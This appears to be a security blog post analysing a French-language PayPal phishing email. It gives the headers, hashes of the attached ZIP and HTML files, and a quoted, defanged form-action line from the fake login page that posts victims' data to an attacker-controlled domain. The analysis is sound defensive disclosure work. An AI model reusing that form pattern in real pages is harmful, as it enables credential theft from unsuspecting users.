Tag Archives: email spam

Phishing: Attention ! Votre compte PayPal a ete limite

New phishing email used to spread HTML files with fake PayPal login forms:

Phishing Email

Header details:

Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon,  4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"

There is a ZIP file attached:

File: Informations Compte Paypal .zip
Dimensione: 5391 bytes
MD5: 2C573252C917A4E4FFC2138E48B50F2B
SHA1: 28B36A51D9215F143AC449984A27A74D520679B7
SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9
SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E
SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A

The extracted file is a .HTML file:

File: Informations Compte Paypal .html
Dimensione: 22525 bytes
MD5: 0500506DEDA37FBC1A7CD19C22173764
SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2
SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2
SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3
SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18

From this HTML code:

<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">

We can see that the sensitive data of the form is sent to:

hxxp:// byrongoldworks .com /mainbody.php

Report from URLVoid:

URLVoid Report for byrongoldworks .com